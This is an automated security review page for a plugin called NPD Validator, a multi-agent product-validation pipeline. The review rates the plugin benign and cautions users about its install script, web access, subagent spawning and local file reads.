Pluginv1.0.0

ClawScan security

NPD Validator · ClawHub's context-aware review of the artifact, metadata, and declared behavior.

Scanner verdict

BenignApr 20, 2026, 9:30 PM

Verdict: benign
Confidence: high
Model: gpt-5-mini
Summary: The plugin's requirements, instructions, and files align with a multi‑agent product‑validation pipeline; nothing requests unrelated credentials or hidden network endpoints, but inspect the included install script and be mindful of the plugin's web access and file I/O.
Guidance: This plugin appears internally consistent with its stated purpose. Before installing or running it: (1) review openclaw-install.sh — it will create workspace files on disk; only run it in a safe/isolated directory; (2) be aware the agents perform many web searches and use WebFetch/SubAgent and will read/write data/*.md — do not place secrets or unintended proprietary files in the plugin workspace; (3) the plugin does not request external credentials, but because it can autonomously spawn subagents and fetch web data, prefer running it in an environment without access to sensitive system-level files or hidden credentials; (4) if you need tighter controls, limit web access or run the skill in a sandboxed account/workspace.

Review Dimensions

Purpose & Capability: okThe skill's name/description (multi‑agent NPD validation) matches the included files and runtime instructions: multiple evaluator agent prompts, a consensus director, devil's advocate, and orchestrator SKILL.md. Declared requirements are minimal and proportional — web search/WebFetch and subagent behavior in the agent prompts are expected for market research and multi‑agent orchestration.
Instruction Scope: noteThe SKILL.md and agent files instruct agents to perform many web searches, read/write local workspace files (data/*.md), and produce evaluation artifacts — all consistent with the stated purpose. This also means the skill will access any user-provided data placed under data/user_provided/ (explicitly used by the Commercial Viability agent). That is reasonable for the task but is a potential privacy/exposure point: do not place highly sensitive secrets in the workspace unless you intend the plugin to use them.
Install Mechanism: noteThere is no automated install spec (instruction-only), which is low risk. However, the repository includes openclaw-install.sh (9KB) that, if executed, writes workspace files (SOUL.md, AGENTS.md, MEMORY.md, copies agent prompts, seeds memory). Review this script before running; it will create files on disk in the target directory. No remote downloads, URL fetches, or obscure binaries are present in the manifest.
Credentials: okThe skill declares no required environment variables or credentials. The agent prompts request WebSearch/WebFetch/SubAgent tool usage, which is appropriate for web research. There are no unrelated credential or config path requests. Note: evaluators explicitly prefer and may read user-provided commercial data (data/user_provided/), which is necessary for accurate economics assessment — make sure sensitive business data is shared intentionally.
Persistence & Privilege: notealways:false (default) and disable-model-invocation:false (normal). The Consensus Director agent is allowed to spawn SubAgent operations and use WebFetch; that capability is coherent with a multi-agent pipeline but increases the plugin's operational blast radius if it runs autonomously. This is expected here, but you should be comfortable granting web access and subagent execution in the environment where you install it.